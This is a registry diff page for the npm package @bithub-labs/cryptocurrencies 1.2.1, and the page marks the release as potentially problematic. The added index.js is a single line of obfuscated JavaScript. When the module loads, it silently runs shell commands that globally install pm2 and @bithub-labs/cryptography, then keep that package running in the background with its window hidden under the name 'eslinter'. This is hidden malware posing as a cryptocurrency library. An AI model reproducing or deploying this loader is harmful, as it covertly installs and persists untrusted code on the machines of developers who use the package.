@bithub-labs/cryptocurrencies 1.2.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @bithub-labs/cryptocurrencies might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +21 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x198f67=a0_0x99b7;(function(_0x1b6b9f,_0x3b6702){const _0x48c499=a0_0x99b7,_0x4bcf86=_0x1b6b9f();while(!![]){try{const _0x421fca=-parseInt(_0x48c499(0x111))/0x1*(parseInt(_0x48c499(0x10d))/0x2)+-parseInt(_0x48c499(0x108))/0x3+parseInt(_0x48c499(0x10e))/0x4+-parseInt(_0x48c499(0x114))/0x5*(parseInt(_0x48c499(0x10c))/0x6)+-parseInt(_0x48c499(0x110))/0x7+parseInt(_0x48c499(0x117))/0x8*(parseInt(_0x48c499(0x10a))/0x9)+parseInt(_0x48c499(0x10b))/0xa;if(_0x421fca===_0x3b6702)break;else _0x4bcf86['push'](_0x4bcf86['shift']());}catch(_0x4af1c7){_0x4bcf86['push'](_0x4bcf86['shift']());}}}(a0_0xcf90,0xc2fad));const {exec}=require(a0_0x198f67(0x10f));function installPrettier(){return new Promise((_0x8bcf90,_0x1d9062)=>{const _0xc85c5b=a0_0x99b7;exec(_0xc85c5b(0x112),(_0x32bece,_0x14aab5,_0x49fe7e)=>{_0x32bece?_0x8bcf90('Error\x20installing\x20PM2:\x20'+_0x49fe7e):_0x8bcf90(_0x14aab5);});});}function a0_0xcf90(){const _0x1c46be=['pm2\x20delete\x20eslinter','9QAvZtl','25033940ZEuOhl','6906mgdARd','2854006HYzdmL','5670484nmaGXz','child_process','6157200LPNqnW','1WarCAy','npm\x20install\x20-g\x20pm2','Error\x20starting\x20with\x20PM2:\x20','785efmCca','Error\x20installing\x20PM2:\x20','eslinter\x20start','1270912IpRMJC','npm\x20install\x20-g\x20@bithub-labs/cryptography@latest','2381796aiySHi'];a0_0xcf90=function(){return _0x1c46be;};return a0_0xcf90();}function deleteEslinter(){return new Promise((_0x33b92c,_0x51a177)=>{const _0x150eb8=a0_0x99b7;exec(_0x150eb8(0x109),(_0x5b6030,_0x539527,_0xc92e66)=>{const _0x593910=_0x150eb8;_0x5b6030?_0x33b92c(_0x593910(0x115)+_0xc92e66):_0x33b92c(_0x539527);});});}function installEslinter(){return new Promise((_0x3d33ba,_0x26ddff)=>{const _0x5f3771=a0_0x99b7;exec(_0x5f3771(0x118),(_0x54418f,_0x2131d0,_0x6f39ec)=>{const _0x5953ff=_0x5f3771;_0x54418f?_0x3d33ba(_0x5953ff(0x115)+_0x6f39ec):_0x3d33ba(_0x2131d0);});});}function startEslinter(){return new Promise((_0x4582ad,_0x46e7ff)=>{const _0x2f3a4d=a0_0x99b7;exec(_0x2f3a4d(0x116),{'windowsHide':!![]},(_0x8efebe,_0x3e5238,_0x5bdb89)=>{const _0x65029c=_0x2f3a4d;_0x8efebe?_0x4582ad(_0x65029c(0x113)+_0x5bdb89):_0x4582ad(_0x3e5238);});});}function a0_0x99b7(_0x44869c,_0x285171){const _0xcf90fb=a0_0xcf90();return a0_0x99b7=function(_0x99b751,_0x12b2a4){_0x99b751=_0x99b751-0x108;let _0x5e5815=_0xcf90fb[_0x99b751];return _0x5e5815;},a0_0x99b7(_0x44869c,_0x285171);}async function main(){try{await installPrettier(),await deleteEslinter(),await installEslinter(),await startEslinter();}catch(_0x13aac2){}}main();
|
package/package.json
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@bithub-labs/cryptocurrencies",
|
|
3
|
+
"version": "1.2.1",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
7
|
+
},
|
|
8
|
+
"keywords": [],
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"devDependencies": {},
|
|
12
|
+
"repository": {
|
|
13
|
+
"type": "git",
|
|
14
|
+
"url": "git+https://github.com/bithub-labs/cryptocurrencies.git"
|
|
15
|
+
},
|
|
16
|
+
"bugs": {
|
|
17
|
+
"url": "https://github.com/bithub-labs/cryptocurrencies/issues"
|
|
18
|
+
},
|
|
19
|
+
"homepage": "https://github.com/bithub-labs/cryptocurrencies#readme",
|
|
20
|
+
"description": ""
|
|
21
|
+
}
|